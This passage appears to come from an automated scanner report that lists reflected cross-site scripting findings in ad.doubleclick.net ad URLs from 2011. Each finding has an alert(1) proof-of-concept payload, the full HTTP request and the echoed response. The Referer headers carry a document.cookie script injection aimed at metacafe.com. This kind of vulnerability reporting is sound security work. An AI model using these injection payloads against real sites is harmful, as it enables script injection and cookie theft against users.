29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313d87af'-alert(1)-'92dc5cf3e85&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw.com/\">
...[SNIP]...

3.6. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28566"-alert(1)-"c54abcfeda6 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-693997578450531328566"-alert(1)-"c54abcfeda6&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-693997578450531328566"-alert(1)-"c54abcfeda6&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw.com/");

var fscUrl = url;

var fscUrlClickTagFound = false;

var wmo
...[SNIP]...

3.7. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fcbe"-alert(1)-"fd139792dbe was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=08fcbe"-alert(1)-"fd139792dbe&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=08fcbe"-alert(1)-"fd139792dbe&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw
...[SNIP]...

3.8. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74214'-alert(1)-'6b515b85808 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=074214'-alert(1)-'6b515b85808&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=074214'-alert(1)-'6b515b85808&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw
...[SNIP]...

3.9. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 168dc"-alert(1)-"4bc3c012150 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw168dc"-alert(1)-"4bc3c012150&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw168dc"-alert(1)-"4bc3c012150&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw.com/");

var fscUrl = url;

var fscUrl
...[SNIP]...

3.10. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d096f'-alert(1)-'c9bc2352f53 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzwd096f'-alert(1)-'c9bc2352f53&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzwd096f'-alert(1)-'c9bc2352f53&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldofudraw.com/\">
...[SNIP]...

3.11. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad9d5'-alert(1)-'414f1c46651 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=Lad9d5'-alert(1)-'414f1c46651&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b09/f/210/%2a/m%3B239990545%3B0-0%3B0%3B62878001%3B4307-300/250%3B41692150/41709937/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=Lad9d5'-alert(1)-'414f1c46651&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcw
...[SNIP]...

3.12. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25d83"-alert(1)-"24bc777dba0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L25d83"-alert(1)-"24bc777dba0&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3b09/f/210/%2a/m%3B239990545%3B0-0%3B0%3B62878001%3B4307-300/250%3B41692150/41709937/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=L25d83"-alert(1)-"24bc777dba0&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcw
...[SNIP]...

3.13. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb8d6"-alert(1)-"3bdf7305698 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=cb8d6"-alert(1)-"3bdf7305698 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7545
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 12:50:46 GMT
Expires: Mon, 16 May 2011 12:50:46 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Apr 28 10:48:35 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=cb8d6"-alert(1)-"3bdf7305698http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1bxx_pain");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var
...[SNIP]...

3.14. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be027'-alert(1)-'aa4739289b5 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=be027'-alert(1)-'aa4739289b5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
